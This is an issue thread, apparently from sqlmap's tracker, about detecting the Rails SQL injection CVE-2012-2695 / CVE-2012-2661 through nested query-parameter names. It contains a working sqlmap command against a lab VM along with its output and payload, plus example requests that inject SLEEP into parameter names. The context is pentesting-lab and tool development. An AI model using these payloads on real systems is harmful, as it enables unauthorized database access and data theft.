omarkurt
commented
9 years ago Hi, Ogglas.
Are you have online test case/ writed case?
Closed Ogglas closed 9 years ago
omarkurt
commented
9 years ago Hi, Ogglas.
Are you have online test case/ writed case?
Ogglas
commented
9 years ago No I do not have that at the moment.
Ogglas
commented
9 years ago Similar environment (CVE-2012-2661) available here though:
omarkurt
commented
9 years ago Hmm, okey Ogglas. Thanks for help.
stamparm
commented
9 years ago It goes like this. This would require rewriting of sqlmap's engine to support automatic injection into the parameter names (note: sqlmap can do this if user manually puts the injection marker * there). This would introduce twice as many requests (1 set for parameter names and 1 set for parameter values). After the required update, this (automatic approach) would be feasible out of box.
Now, as this is currently old(-ish) vulnerability I am voting for leaving here details how to exploit it in sqlmap (if user knows that the vulnerability is there or suspects) rather than messing the code and introducing twice as many test requests
stamparm
commented
9 years ago More info about the vulnerability and how to exploit it: https://pentesterlab.com/exercises/cve-2012-2661/course
Original URI (testing environment using ISO from https://pentesterlab.com/exercises/cve-2012-2661):
http://192.168.146.133/?id=1
sqlmap run:
python sqlmap.py -u "http://192.168.146.133/?id[information_schema%20WHERE%201%3D1*%20%3B%20--%20.user][1]=1" --eval='import time;uri=uri.replace("user]", "user%d]" % time.time())' --level=3 --risk=3 --time-sec=1
...
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 129 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: http://192.168.146.133:80/?id[information_schema WHERE 1=1 AND SLEEP(1) ; -- .user][1]=1
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
[11:19:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: Apache 2.2.16
back-end DBMS: MySQL 5.0.12p.s. due to nature of this vulnerability, SLEEP statement is being run multiple times (i.e. 1 delayed subquery per one table in information_schema database because of affected SHOW TABLES statement), so expect VERY SLOW data retrieval
Is there anyway to use sqlmap to find this vulnerability?
"The Active Record component in Ruby on Rails before 3.0.14, 3.1.x before 3.1.6, and 3.2.x before 3.2.6 does not properly implement the passing of request data to a where method in an ActiveRecord class, which allows remote attackers to conduct certain SQL injection attacks via nested query parameters that leverage improper handling of nested hashes, a related issue to CVE-2012-2661."
Example CVE-2012-2661: Request:
controller?id=123Query:SELECTposts.* FROMpostsWHEREposts.id= '123'Request:
controller?id[table.column]=123Query:SELECTposts.* FROMpostsWHEREtable.column= '123'Examples CVE-2012-2695: 1)
Request:
controller?id=123Query:SELECTposts.* FROMpostsWHEREposts.id= '123'Request:
controller?id[table][column]=123Query:SELECTposts.* FROMpostsWHEREtable.column= '123'2)
Request:
controller?id=123Query:SELECTposts.* FROMpostsWHEREposts.id= '123Request:
controller?id[mysql%20where%20(select%200)%20or%20sleep(1).xxx][yyy]=123Queries:SHOW TABLESSHOW TABLES IN mysql where (select 0) or sleep(1)(...)SELECTposts.* FROMpostsWHEREmysql where (select 0) or sleep(1).xxx.yyy= '123'http://www.cvedetails.com/cve/CVE-2012-2695/ http://blog.conviso.com.br/2012/06/ruby-on-rails-sql-injection-cve-2012_15.html http://seclists.org/oss-sec/2012/q2/504